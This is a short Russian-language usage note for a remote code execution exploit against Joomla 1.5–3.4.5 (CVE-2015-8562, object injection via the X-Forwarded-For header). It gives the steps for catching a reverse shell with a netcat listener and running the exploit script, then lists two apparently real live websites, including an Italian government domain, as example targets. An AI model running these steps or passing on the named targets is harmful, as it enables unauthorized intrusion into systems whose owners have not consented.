
Joomla 1.5 - 3.4.5 Object Injection RCE заголовок X-Forwarded-For
Эксплойт: Joomla 1.5 - 3.4.5 Object Injection RCE через заголовок X-Forwarded-For:
Дата уязвимости: 17.12.2015
Автор эксплойта: anarc0der
Версия: Joomla 1.5 - 3.4.5
CVE: CVE-2015-8562
Как использовать:
Откройте один терминал и слушайте с помощью nc: $ nc -lnvp 4444
Откройте другой терминал и выполните эксплойт:
python3 rce.py --target='target' --ip='ip' --port=4444
Примеры целей для PoC (Не трогайте их, используйте как пример для других):
http://www.monitoraggiograduatorie.gov.it/
http://budo-aykac.nl/